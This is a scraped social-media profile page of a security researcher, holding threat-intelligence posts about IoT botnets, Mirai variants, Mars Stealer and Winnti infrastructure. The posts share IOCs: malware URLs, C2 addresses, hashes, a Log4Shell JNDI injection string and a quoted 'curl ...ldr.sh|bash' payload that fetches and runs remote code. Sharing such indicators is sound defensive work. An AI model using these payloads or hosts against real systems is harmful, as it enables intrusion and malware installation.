Toli

130 posts

Toli banner
Toli

Toli

@tolisec

Security Researcher. creator @elfdigest.

United Kingdom Katılım Kasım 2017
743 Takip Edilen922 Takipçiler
Sabitlenmiş Tweet
Toli
Toli@tolisec·
IoT Botnet Exploiting #CVE-2021-44228 #log4j User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat} The payload is JavaScript code executed in Java using ScriptEngineManager. IOCs and sample: tolisec.com/iot-botnet-exp…
Toli tweet mediaToli tweet media
English
1
42
110
0
Fox_threatintel
Fox_threatintel@banthisguy9349·
#obfuscated #elf found that by the looks of it is a variant of #mirai malware urls: hxxp://185.196.10.215:12234/mips.bin hxxp://185.196.10.215:12234/x86_64.bin They really tried to hide on port 12234 with .bin file extension 🤣 cc: @tolisec @500mk500 @abuse_ch
Fox_threatintel tweet media
English
2
1
16
6.7K
Toli
Toli@tolisec·
@banthisguy9349 potential C2 for [aee499304dd672782f404c1da20436ce162c44cd37f9d256275089fc17b2d7ed] is 147.78.12[.]176
Indonesia
1
0
1
96
Fox_threatintel
Fox_threatintel@banthisguy9349·
fresh observed #elf #malware ! with very low detections 5c21a3451c7f4bcb6737a8904efc7ea9ee10b3994f324b2ece1610883c2394f1 3bd5be1f538f8cc195dbffd77d01e0c2509c56139a307b72d72d5bdbe2245584 c9e62e041871b6a8be78ea685ec57d50e6b7006955cd2268c5413828958aa2fe x.com/banthisguy9349…
Fox_threatintel@banthisguy9349

IOC's of malware being spread to infected the devices. urlhaus.abuse.ch/host/38.6.224.… - up urlhaus.abuse.ch/host/204.93.16… - up urlhaus.abuse.ch/host/62.72.185… - down urlhaus.abuse.ch/host/141.98.10… - down urlhaus.abuse.ch/browse.php?sea…

English
4
8
16
2.5K
Toli retweetledi
☩MalwareMustDie
☩MalwareMustDie@malwaremustdie·
📢 In #FIRSTCTI22, @unixfreaxjp w/ LACERT teams will share the implementation of @FIRSTdotOrg #CTI Curriculum methods into their investigation of targeted #WebSkimming threat as takeaways for #BlueTeam #pTargeted-Web-Skimming-on-E-Commerce-Sites" target="_blank" rel="nofollow noopener">first.org/events/symposi… Register soon, we value your time with good sharing!
FIRST.org@FIRSTdotOrg

Register for #FIRSTCTI22 in Berlin, 1-3 November! Program agenda is available for viewing at ow.ly/uhL750KCkBO. Room block offers expire soon! #cybersec #misp #threatintelligence #threatscape #cti

English
1
14
24
0
Toli retweetledi
Germán Fernández
Germán Fernández@1ZRR4H·
Están llegando los mineros! 🤖 (CVE-2022-1388) IP atacante: 85.106.114.175 🇹🇷 Payload: curl 202.28.229.174/ldr.sh|bash Muestras: bazaar.abuse.ch/browse/tag/CVE… * Incluye exfiltración de credenciales SSH
Germán Fernández tweet mediaGermán Fernández tweet mediaGermán Fernández tweet mediaGermán Fernández tweet media
Español
5
10
27
0
Toli retweetledi
Eric Capuano - Bsky: @eric.zip
Eric Capuano - Bsky: @eric.zip@eric_capuano·
Everybody is familiar with the value of a tool like VirusTotal for malware... Ever wanted a similar tool for analyzing _not_ malware? Check out @echotrailco - solid collection of information & stats about common binaries found on healthy systems. echotrail.io
English
7
78
302
0
Toli retweetledi
R.
R.@0xrb·
𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia Threat Actor keep changing urls C2 Domain : http://jsdkca(.)link/518855.php hash: 6e304b4616eb9daa7da76d3c1894d5e62af10fe6dc3d6b2356518dbb1121d6b9 Seems malware infection in maas in this C2
R. tweet media
English
0
8
21
0
Toli retweetledi
R.
R.@0xrb·
Currently 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia They are targeting again India, Brazil, Indonesia,Egypt,Vietnam,Pakistan, Philippines,Mexico C2: hxxp://jsdkct(.)link/47747.php Hash: 95b229600f28adfbe56fc09cd8a8ff88baf261329999f681613e5c951907d451
R. tweet media
English
1
13
24
0
Toli retweetledi
R.
R.@0xrb·
Recently deployed #Mars #Stealer #Malware C2: http://62.204.41.180/5xtELSMXvf.php Hash: 4d0b2e81d023a1704d0fb71cf3e689ec43a813c4041e6d0d5503de2732d18f15 e5e16ce47ed80d3b802a9c36f7ae408493d1e491ce83f72f253832b150aeb4bc
R. tweet media
Italiano
0
6
7
0
Toli retweetledi
R.
R.@0xrb·
Recent Chinese Threat Actor #Winnti panel C2: ip: 204.15.78.131:3220 (TCP) url: us\.\host.skybad\.\top Actual Payload hosted here : http://160.251.42(.)252/xghk.exe hash: c99397d66e49e2def1b17f57cd0c5fb9 #GoldDragon #ZxShell #threatintel cc: @500mk500 (;
R. tweet mediaR. tweet media
English
5
25
77
0